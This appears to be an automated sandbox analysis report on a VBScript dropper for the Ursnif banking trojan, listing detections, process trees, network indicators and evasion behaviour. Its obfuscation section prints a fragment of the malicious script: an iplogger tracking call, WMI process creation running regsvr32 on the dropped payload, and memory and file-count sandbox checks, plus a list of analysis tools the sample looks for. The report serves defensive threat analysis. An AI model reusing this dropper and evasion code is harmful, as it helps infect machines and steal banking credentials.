
Analysis Report: presentation#_37412.vbs

Overview

General Information

Sample Name: presentation#_37412.vbs
MD5: 570cab3ed56a9c69bc3e5b85a838b42d
SHA1: c2952cbb31ee98c5c1a676e1820a3c73345083a0
SHA256: 3a34c90fa6f4c879311dee500a97fb07aa8f62e338d6d4c539132d1d0234079e

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to query locale information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • wscript.exe (PID: 3324 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation#_37412.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 1168 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\afterbirth.rs MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 1096 cmdline: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 3436 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3436 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1668 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1668 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3236 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2332 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3236 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3868 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2656 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started, Author: Florian Roth, Data: Command: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, CommandLine: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1168, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\afterbirth.rs, ProcessId: 1096

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at, Virustotal: Detection: 10%
Source: http://cdn.arsis.at:80, Virustotal: Detection: 10%
Source: http://cdn.arsis.at/, Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\afterbirth.rs, Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\afterbirth.rs, ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: presentation#_37412.vbs, Virustotal: Detection: 31%
Source: presentation#_37412.vbs, ReversingLabs: Detection: 23%

Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 5_2_0118258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 5_2_0118258E
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 5_2_73701E40 FindFirstFileExA, 5_2_73701E40
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Desktop\desktop.ini

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View, IP Address: 47.91.16.227
Source: Joe Sandbox View, IP Address: 88.99.66.31
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown, DNS traffic detected: queries for: iplogger.org
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Server: nginx, Date: Fri, 26 Jun 2020 22:13:27 GMT, Content-Type: text/html; charset=utf-8, Transfer-Encoding: chunked, Connection: close, Content-Encoding: gzip, Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a, Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F15F3 NtMapViewOfSection, | 5_2_736F15F3
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F18DB GetProcAddress,NtCreateSection,memset, | 5_2_736F18DB
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F2775 NtQueryVirtualMemory, | 5_2_736F2775
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_01183A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, | 5_2_01183A67
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118AEB5 NtQueryVirtualMemory, | 5_2_0118AEB5
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F2554 | 5_2_736F2554
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_011815D6 | 5_2_011815D6
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118AC94 | 5_2_0118AC94
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_73704610 | 5_2_73704610
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_73708A88 | 5_2_73708A88
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\afterbirth.rs A749960A8CB6111201C02A03DD751A289D193F19E53D8B43AE82F9654B654C4C
            Source: presentation#_37412.vbs | Initial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: classification engine | Classification label: mal100.bank.troj.evad.winVBS@16/19@20/2
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation#_37412.vbs'
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: presentation#_37412.vbs | Virustotal: Detection: 31%
            Source: presentation#_37412.vbs | ReversingLabs: Detection: 23%
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation#_37412.vbs'
            Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\afterbirth.rs
            Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\afterbirth.rs
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3436 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1668 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3236 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3868 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\afterbirth.rs
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3436 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1668 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3236 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3868 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
            Source: Binary string: c:\end\dress\Poem\little\Meet\Farm\Part\Neighbor.pdb source: wscript.exe, 00000000.00000003.458283750.000001AF6FA83000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2152633056.000000007370A000.00000002.00020000.sdmp, afterbirth.rs.0.dr

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.ScriptName, "TESTING") > 0) Then' Eben Phillip mimesis Boris manpower. nation ague chinch huh oppressor Mohammedan pollock narcotic. Sam circlet Carpathia change kneel mestizo pentecostal, inflexible schoolmarm actinide Noetherian Ortega, pinxter Exit FunctionEnd Ifprincipal("https://iplogger.org/1bP467")' similitude ergative is675 lobar latitudinal hereafter Laguerre ridicule. covariant59 fruitful gristmill Paso trend hypothetic. 1934820 padre downpour Gutenberg. litmus veracity indigent Stuttgart staunch Rudy chicken whir thrombosis somber zesty impossible pry southpaw dose Susie648 melancholy Set eyelidService = GetObject("winmgmts:Win32_Process")REM Yale massif, 9952976 hyperboloidal thereto hostelry yourselves octillion eyelidService.Create "regsvr32" + " -s " + JPi + "afterbirth.rs" + ""pestleEnd FunctionFunction CL()on error resume nextIf (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) ThenExit FunctionEnd Ifannuli549 = ((79 + (79 + (-(72 + (-8.0))))) + (-91.0))annuli549_download = (((38 + 6156.0) - (81 + 6057.0)) + (-53.0))If CreateObject("Scripting.FileSystemObject").GetFolder(JPi).Files.Count < annuli549 ThenQnEnd IfSet oEJa = CreateObject("WScript.Shell")protest = oEJa.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(protest).Files.Count < annuli549_download ThenQnEnd IfREM bolivar accommodate feckless coronary math Dow coauthor reliquary. Payne, Angelina enterprise. tung parkish Arrhenius warhead innumerable. argumentative hydroxide, highwayman oases forfend ricotta Cuba743 littermate BMW stationery silicate End FunctionFunction penumbral473()' dragging could flocculate frothy injunct cutset agribusiness spectrum, bassoon Winnipeg, Agamemnon Triassic cobweb conduct subsume. 3338206 occupant on error resume nextIf (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) ThenExit Function' peal chlorate asteria hairspring transconductance mulberry privy chilblain injudicious bade archbishop ethereal Skippy windsurf mild quern79, blackbird mutton Taurus bullock luscious steeplechase veil compellable acupuncture stronghold whelm rapier Genevieve End IfSet eyelidService = GetObject("winmgmts:\\.\root\cimv2")REM vignette upstart Gresham viper, whose everlasting. snoopy, 4095978 cranium Imbrium. bossy, 9000185 Laocoon prostitute flaw scatterbrain, gibbet concise mobility publication Harvard statuesque Set whetherlItems = eyelidService.ExecQuery("Select * from Win32_ComputerSystem")For Each liy In whetherlItemsREM Hurd. diagnose, 2758521 bubble shagging Vicksburg allege rust fact. jubilant duct chicanery summer voiceband WkJ = WkJ + Int((liy.TotalPhysicalMemory) / (1048578 - (40 + (-((45 + (-28.0)) + 21.0)))))NextIf WkJ < (((264 - 215.0) + (1149 - 69.0)) - 99.0) Then' eclipse ditty chapter Gestapo graveyard Angola Dutch solecism line Chinese Wilhelmina Bach reconnaissance Harold colorate horrendous, 542178 ineradicable condensate Fayette in
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F2543 push ecx; ret | 5_2_736F2553
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_736F24F0 push ecx; ret | 5_2_736F24F9
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118ED26 pushfd ; retf | 5_2_0118ED36
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118A950 push ecx; ret | 5_2_0118A959
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0118AC83 push ecx; ret | 5_2_0118AC93
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_73704FBD push dword ptr [esp+ecx-75h]; iretd | 5_2_73704FC1
            Source: initial sample | Static PE information: section name: .text entropy: 6.8378665447

            Persistence and Installation Behavior:

            Creates processes via WMI
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\afterbirth.rs
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\afterbirth.rs

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000002.2152427500.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731175502.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730795348.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730921854.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731097456.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731198463.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.730980508.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731140018.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.731043829.00000000056C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1096, type: MEMORY
            Deletes itself after installation
            Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\presentation#_37412.vbs
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE=
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.471340635.000001AF70554000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
